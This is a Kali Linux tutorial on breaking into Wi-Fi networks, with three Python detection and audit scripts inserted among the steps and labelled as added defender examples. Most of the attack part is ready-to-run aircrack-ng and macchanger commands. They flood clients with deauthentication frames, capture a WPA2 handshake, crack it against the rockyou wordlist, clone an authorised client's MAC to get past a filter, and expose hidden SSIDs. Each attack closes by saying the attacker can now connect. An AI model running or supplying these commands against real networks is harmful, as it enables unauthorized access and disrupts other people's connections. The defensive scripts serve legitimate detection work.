
Breaking WPA2 Wireless


What is WPA?

  • Wi-Fi Protected Access

  • Encrypts plain text to Cipher text

  • Can be Decrypted only if the key is known


Breaking WPA2 Wireless

Platform:-

  kali-linux v1.0.6

Download from:-

  http://www.kali.org

Requirements:-

# airmon-ng:
To start Wireless monitoring
# airodump-ng:
To discover access points
# aireplay-ng:
To reassociate access points
# aircrack-ng:
To decrypt WPA2 password

Step 1

Check if the Wireless Card is being recognized by the OS.

Command:

 # airmon-ng

Step 2

Create a Monitoring Interface(mon0) on the Wireless Interface

Command:

 # airmon-ng start wlan0

Step 3

Check for Access Points in range through the mon0 interface

Command:

 # airodump-ng mon0

Step 4

Capture & Write the WPA handshake information to a File which will contain the Encrypted key.

Command:

 # airodump-ng -w <FILENAME> -c 11 --bssid <target MAC> mon0

-c --> fixing channel to monitor
-w --> writes data to filename specified


Step 5

Send DeAuthentication packets to the Access Point to Disassociate the clients of that Access Point to capture Handshake Data when clients reconnect.

Command:

 # aireplay-ng -0 0 -a <target MAC> mon0

-a --> fixing MAC of the targeted Access Point
-0 0 --> send infinite Deauthentication packets


Stop when WPA-handshake is captured.


Step 6

Matching WPA2 handshake encryption packets with wordlist

Command:

 # aircrack-ng <FILENAME-01.cap> -w <path to wordlist>

-w --> fixing filename path to wordlist

A ready-made wordlist is available in Kali Linux at the path: /usr/share/wordlists/rockyou.txt
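Whether this step succeeds is decided entirely by the passphrase: once the handshake is on disk every guess is verified offline, so the only defence is a pre-shared key that no wordlist contains, either exactly or as a trivial variation. The audit below is an added example for the defender, not code from the original page or from the aircrack-ng project; the sample wordlist, the 14-character minimum and the function names are assumptions. It applies the same exact-match test the page's command performs, plus a case-insensitive, trailing-digits-stripped comparison for the obvious mutations.

```python
import re
import sys

# Constructed stand-in for a wordlist such as rockyou.txt (hypothetical entries).
SAMPLE_WORDLIST = """
password
123456
iloveyou
sunshine
princess
""".split()

MIN_LENGTH = 14  # assumed policy threshold, not from the original page


def normalize(candidate: str) -> str:
    """Lower-case the passphrase and strip trailing digits, so that trivial
    mutations of a wordlist entry (e.g. 'Sunshine2014') are still caught."""
    return re.sub(r"\d+$", "", candidate.lower())


def audit_passphrase(candidate: str, wordlist) -> list:
    """Return the list of findings for a WPA2 pre-shared key candidate.

    An empty list means the candidate passed every check."""
    words = {w.strip() for w in wordlist if w.strip()}
    findings = []
    # IEEE 802.11i restricts an ASCII passphrase to 8-63 characters.
    if not 8 <= len(candidate) <= 63:
        findings.append("outside the 8-63 character range allowed for a WPA2 passphrase")
    if len(candidate) < MIN_LENGTH:
        findings.append(f"shorter than {MIN_LENGTH} characters")
    if candidate in words:
        findings.append("exact match in wordlist")
    elif normalize(candidate) in words:
        findings.append("trivial variation of a wordlist entry")
    return findings


def load_wordlist(path: str):
    """Stream a wordlist file line by line; rockyou.txt is not valid UTF-8,
    so decode it leniently rather than failing part-way through."""
    with open(path, encoding="latin-1", errors="ignore") as fh:
        for line in fh:
            yield line.rstrip("\n")


if __name__ == "__main__":
    # Usage: python3 audit.py '<passphrase>' [/usr/share/wordlists/rockyou.txt]
    phrase = sys.argv[1] if len(sys.argv) > 1 else "Sunshine2014"
    words = load_wordlist(sys.argv[2]) if len(sys.argv) > 2 else SAMPLE_WORDLIST
    result = audit_passphrase(phrase, words)
    print("OK" if not result else "; ".join(result))
```

Loading the full list into a set costs memory proportional to the list, which is acceptable for rockyou.txt on a workstation; for a multi-gigabyte list the same check should stream and compare per line instead.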


Task Accomplished!

So we should be able to connect to the Wireless Access Point by using the acquired key.


Bypassing MAC address filters


What is MAC filtering?

  • MAC addresses are uniquely assigned to each device.

  • MAC Filtering is a security access control technique in which the address assigned to each network card is used to determine its access to the network.

  • It allows or denies access only to specific devices whose MAC addresses are already registered at the Access Point.

Working

[Figure: how MAC filtering works; how MAC filtering is attacked]

Bypassing Wireless MAC Filter on an Access Point

Platform:-

  kali-linux v1.0.6

Download from:-

  http://www.kali.org

Requirements:-

# airmon-ng:
To start Wireless monitoring
# airodump-ng:
To discover access points
# macchanger:
To change MAC address

Step 1

Verify if the Wireless card is detected by the OS.

Command:

 # airmon-ng

Step 2

Create and start a Logical Monitoring Interface to monitor data packets on wireless network.

Command:

 # airmon-ng start wlan0

Step 3

Check for Access Points by capturing all Wireless Data Packets in range.

Command:

 # airodump-ng mon0

Select an Access Point to attack and take a note of its Channel


Step 4

Catch only the targeted Access Point's data packets by using its Channel and MAC address.

Command:

 # airodump-ng -c 11 -a --bssid <Target AP MAC> mon0

--bssid --> fixing the MAC address of the target Access Point
-a --> show only clients associated with that Access Point
-c --> setting the channel


Step 5

Send deauthentication packets to disassociate connected clients, in order to capture the SSID name during reassociation
(Deauthentication Attack)

Command:

 # aireplay-ng -0 0 -a <Target MAC> mon0

-a --> fixing the MAC address of the target Access Point
-0 0 --> sending an infinite number of deauthentication packets

This will give you the SSID of the hidden Access Point

Step 6

Change our machine's MAC address to the Associated Client's MAC address

To change our MAC address we have to stop mon0.

Command:

 # airmon-ng stop mon0

Step 7

Time to change our machine's MAC address!

Command:

 # macchanger -m <new MAC> wlan0

Step 8

Restart the wlan0 interface.

Command:

 # ifconfig wlan0 down
 # ifconfig wlan0 up

Task Accomplished!

Now You Should be able to Connect to the Targeted Wireless Access Point.
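A MAC filter cannot tell the registered client from a card that has copied its address, but two radios transmitting under one MAC at the same time do leave a trace: each radio keeps its own 12-bit 802.11 sequence counter, so the frames seen for that address carry two interleaved counters and the sequence number keeps running backwards. The detector below is an added example written for the defender, not part of the original page or of any tool it mentions; the frame tuples, the 64-step tolerance and the function names are constructed assumptions. It only fires while both stations are active, which is why the practical answer to this page's scenario is an authentication layer rather than a MAC list.

```python
SEQ_MODULO = 4096    # the 802.11 sequence number is a 12-bit counter
BACKWARD_JUMP = 64   # assumed tolerance for reordering, not from the original page

# Constructed sample (not real traffic): (time, source MAC, sequence number).
# 02:00:00:00:02:00 is used by two radios at once; 02:00:00:00:03:00 merely
# wraps its counter from 4095 to 0, which must not be flagged.
SAMPLE_FRAMES = [
    (10.00, "02:00:00:00:02:00", 1500),
    (10.10, "02:00:00:00:02:00", 1501),
    (10.20, "02:00:00:00:02:00", 1502),
    (10.30, "02:00:00:00:02:00", 310),   # second radio, same MAC, own counter
    (10.40, "02:00:00:00:02:00", 1503),
    (10.50, "02:00:00:00:02:00", 311),
    (11.00, "02:00:00:00:03:00", 4094),
    (11.10, "02:00:00:00:03:00", 4095),
    (11.20, "02:00:00:00:03:00", 0),     # legitimate 12-bit wraparound
]


def backward_steps(prev: int, cur: int) -> int:
    """How far the counter moved backwards from prev to cur, or 0 if it moved
    forwards.  The shortest distance around the 4096-value ring decides the
    direction, so a wrap from 4095 to 0 counts as a forward step of 1."""
    forward = (cur - prev) % SEQ_MODULO
    if forward > SEQ_MODULO // 2:
        return SEQ_MODULO - forward
    return 0


def detect_duplicate_mac(frames, tolerance: int = BACKWARD_JUMP) -> list:
    """Return one alert (src, time, previous_seq, seq) per source MAC whose
    sequence counter runs backwards by more than `tolerance` steps."""
    last_seq = {}
    flagged = set()
    alerts = []
    for t, src, seq in frames:
        if src in last_seq:
            back = backward_steps(last_seq[src], seq)
            if back > tolerance and src not in flagged:
                flagged.add(src)
                alerts.append((src, t, last_seq[src], seq))
        last_seq[src] = seq
    return alerts


if __name__ == "__main__":
    for src, t, prev, seq in detect_duplicate_mac(SAMPLE_FRAMES):
        print(f"{t:.2f}: {src} sequence counter jumped {prev} -> {seq}; "
              "possible duplicate MAC")
```

Sequence numbers are per transmitter, so the same logic also separates a client from a station cloning its address on a different channel, as long as both are captured from one monitor interface; retransmissions repeat the same number (a backward distance of 0) and are ignored.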


Finding Hidden SSIDs


What is an SSID?

  • SSID is short for service set identifier.

  • An SSID is a unique ID or name that distinguishes one wireless network from the others around it and avoids overlap.

  • SSIDs have a maximum length of 32 characters.

Discovering an "Access Point" that is "Hiding" itself

Requirements:-

# airmon-ng:
To start Wireless monitoring
# airodump-ng:
To discover access points
# aireplay-ng:
To reassociate access points

Step 1

Check if the Wireless Card is being recognized by the OS

Command:

 # airmon-ng

Step 2

Create a "Logical Monitoring Interface" to monitor the Data packets on wlan0

Command:

 # airmon-ng start wlan0

Step 3

Check for Access Points by Capturing all Wireless Data Packets in Range

Command:

 # airodump-ng mon0

Select an Access Point to attack and take a note of its Channel


Step 4

Restrict Packet Capturing to the channel of the Access Point to be Attacked

Command:

 # airodump-ng -c 11 mon0

-c --> fix channel to monitor


Step 5

Send deauthentication packets to disassociate connected clients, in order to capture the SSID name during reassociation

Command:
 # aireplay-ng -0 0 -a <Target MAC> mon0

-a --> fixing the MAC address of the target Access Point
-0 0 --> sending an infinite number of deauthentication packets
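All three deauthentication steps on this page (the WPA2 handshake capture, the MAC-filter bypass and this hidden-SSID discovery) rely on the same `aireplay-ng -0 0 -a <AP MAC>` flood, and a monitoring station can recognise it: a genuine disconnect produces a single deauthentication frame, whereas the flood produces dozens carrying the AP's address within a few seconds. The sliding-window counter below is an added example written for the defender, not code from the original page or from the aircrack-ng project; the CSV layout, the constructed capture, the 10-second window and the threshold of 20 frames are assumptions. Stations that negotiate 802.11w protected management frames discard such forged frames, which removes the reconnection the attack depends on.

```python
import csv
import sys
from collections import deque

WINDOW_SECONDS = 10.0   # assumed tuning values, not from the original page
THRESHOLD = 20

# Constructed sample capture (not real traffic).  One CSV row per 802.11
# frame: time, frame subtype, source, destination, bssid.  The AP
# 02:00:00:00:01:00 deauthenticates one client legitimately at 100.50, then
# thirty broadcast deauthentication frames appear under its address.
SAMPLE_LOG = [
    "time,subtype,src,dst,bssid",
    "100.00,beacon,02:00:00:00:01:00,ff:ff:ff:ff:ff:ff,02:00:00:00:01:00",
    "100.10,data,02:00:00:00:02:00,02:00:00:00:01:00,02:00:00:00:01:00",
    "100.50,deauth,02:00:00:00:01:00,02:00:00:00:02:00,02:00:00:00:01:00",
] + [
    f"{101.0 + i * 0.05:.2f},deauth,02:00:00:00:01:00,ff:ff:ff:ff:ff:ff,02:00:00:00:01:00"
    for i in range(30)
]


def detect_deauth_floods(lines, window: float = WINDOW_SECONDS,
                         threshold: int = THRESHOLD) -> list:
    """Return one alert (bssid, window_start, count) per BSSID whose
    deauthentication frames inside a sliding time window reach `threshold`.

    `lines` is an iterable of CSV rows with the header shown in SAMPLE_LOG."""
    recent = {}        # bssid -> deque of deauth timestamps still inside the window
    alerted = set()
    alerts = []
    for row in csv.DictReader(lines):
        if row["subtype"] != "deauth":
            continue
        t = float(row["time"])
        bssid = row["bssid"]
        q = recent.setdefault(bssid, deque())
        q.append(t)
        # Drop timestamps that have aged out of the window.
        while q and t - q[0] > window:
            q.popleft()
        if len(q) >= threshold and bssid not in alerted:
            alerted.add(bssid)
            alerts.append((bssid, q[0], len(q)))
    return alerts


if __name__ == "__main__":
    # Usage: python3 deauth_detect.py [capture.csv]
    if len(sys.argv) > 1:
        with open(sys.argv[1], newline="") as fh:
            found = detect_deauth_floods(fh)
    else:
        found = detect_deauth_floods(SAMPLE_LOG)
    for bssid, start, count in found:
        print(f"deauth flood: {count} frames for {bssid} starting at {start:.2f}s")
```

The single deauthentication at 100.50 is counted but never reaches the threshold on its own; the alert fires on the twentieth frame of the burst. A deque per BSSID keeps memory bounded by the number of frames inside one window rather than by the capture length.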

Task Accomplished!

This will give you the SSID of the hidden Access Point
